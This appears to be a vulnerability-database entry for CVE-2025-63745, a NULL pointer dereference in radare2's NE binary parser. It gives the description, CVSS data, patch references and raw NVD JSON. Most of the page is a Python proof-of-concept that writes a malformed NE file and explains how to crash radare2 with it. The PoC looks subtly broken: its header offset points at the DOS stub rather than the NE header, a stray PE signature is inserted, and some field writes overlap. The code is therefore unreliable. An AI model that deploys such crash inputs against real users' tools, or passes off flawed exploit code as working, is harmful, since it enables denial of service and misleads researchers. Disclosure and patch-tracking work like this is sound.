Security Vulnerability Report
CVE-2025-63745 CVSS 5.5 MEDIUM

CVE-2025-63745

Published: 2025-11-14 21:15:45
Last Modified: 2025-11-19 19:01:27

Description

A NULL pointer dereference vulnerability was discovered in radare2 6.0.5 and earlier within the info() function of bin_ne.c. A crafted binary input can trigger a segmentation fault, leading to a denial of service when the tool processes malformed data.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:* - VULNERABLE
radare2 <= 6.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63745 PoC - radare2 NULL Pointer Dereference in bin_ne.c

This PoC generates a malformed NE (New Executable) format binary
that triggers NULL pointer dereference in radare2's info() function.
"""
import struct


def create_malformed_ne_binary():
    """Generate a malformed NE format binary to trigger the vulnerability"""
    # DOS header (MZ signature)
    dos_header = bytearray(64)
    dos_header[0:2] = b'MZ'  # DOS signature
    struct.pack_into('<H', dos_header, 60, 64)  # e_lfanew at offset 60

    # DOS stub, zero-padded to 64 bytes
    dos_stub = b'This program cannot be run in DOS mode.\r\r\n$'
    dos_stub += b'\x00' * (64 - len(dos_stub))

    # PE signature
    pe_signature = b'PE\x00\x00'

    # NE header (malformed)
    ne_header = bytearray(64)
    # NE signature
    ne_header[0:2] = b'NE'
    # Linker major/minor version
    ne_header[2] = 0x06  # Major version
    ne_header[3] = 0x00  # Minor version
    # Entry table offset
    struct.pack_into('<H', ne_header, 0x0C, 0x10)
    # Entry table length
    struct.pack_into('<H', ne_header, 0x0E, 0x00)
    # File load CRC
    struct.pack_into('<I', ne_header, 0x10, 0x00000000)
    # Program flags
    ne_header[0x14] = 0x02  # Requires i386
    # Additional header flags
    struct.pack_into('<H', ne_header, 0x15, 0x0000)
    # Auto data segment
    struct.pack_into('<H', ne_header, 0x1C, 0x0001)
    # Initial heap/Stack sizes
    struct.pack_into('<H', ne_header, 0x1E, 0x1000)
    struct.pack_into('<H', ne_header, 0x20, 0x1000)
    # Initial IP/CS values
    struct.pack_into('<H', ne_header, 0x22, 0x0000)
    struct.pack_into('<H', ne_header, 0x24, 0x0000)
    # Initial SP/SS values
    struct.pack_into('<H', ne_header, 0x26, 0x1000)
    struct.pack_into('<H', ne_header, 0x28, 0x0000)
    # Segment table offset/Count
    struct.pack_into('<H', ne_header, 0x2A, 0x40)  # Offset that may cause issues
    struct.pack_into('<H', ne_header, 0x2C, 0xFFFF)  # Malformed count
    # Resource table offset/Count
    struct.pack_into('<H', ne_header, 0x2E, 0x0000)
    struct.pack_into('<H', ne_header, 0x30, 0x0000)
    # Resident names table offset
    struct.pack_into('<H', ne_header, 0x32, 0x0000)
    # Module references table offset
    struct.pack_into('<H', ne_header, 0x34, 0x0000)
    # Imported names table offset
    struct.pack_into('<H', ne_header, 0x36, 0x0000)
    # Non-resident names table offset
    struct.pack_into('<I', ne_header, 0x38, 0x00000000)

    # Combine all parts
    malformed_binary = dos_header + dos_stub + pe_signature + ne_header
    return bytes(malformed_binary)


if __name__ == '__main__':
    print('[+] Generating malformed NE binary for CVE-2025-63745')
    poc_data = create_malformed_ne_binary()
    output_file = 'CVE-2025-63745_poc.ne'
    with open(output_file, 'wb') as f:
        f.write(poc_data)
    print(f'[+] PoC file created: {output_file}')
    print('[+] To trigger the vulnerability, open this file with radare2:')
    print(f' $ r2 {output_file}')
    print('[+] Or use rabin2:')
    print(f' $ rabin2 -I {output_file}')

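References

https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-001-radare2-nullptr-deref-bin_ne.md (Patch, Third Party Advisory)
https://github.com/marlinkcyber/advisories/blob/main/advisories/radare2-nullptr-deref-bin_ne.md (Patch, Third Party Advisory)
https://github.com/radareorg/radare2/commit/6c5df3f8570d4f0c360681c08241ad8af3b919fd (Patch)
https://github.com/radareorg/radare2/issues/24660 (Issue Tracking)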

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63745", "sourceIdentifier": "[email protected]", "published": "2025-11-14T21:15:45.083", "lastModified": "2025-11-19T19:01:27.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL pointer dereference vulnerability was discovered in radare2 6.0.5 and earlier within the info() function of bin_ne.c. A crafted binary input can trigger a segmentation fault, leading to a denial of service when the tool processes malformed data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.5", "matchCriteriaId": "65F5C1BC-1B1F-4176-961D-C1811BE46456"}]}]}], "references": [{"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-001-radare2-nullptr-deref-bin_ne.md", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/radare2-nullptr-deref-bin_ne.md", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/radareorg/radare2/commit/6c5df3f8570d4f0c360681c08241ad8af3b919fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/radareorg/radare2/issues/24660", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}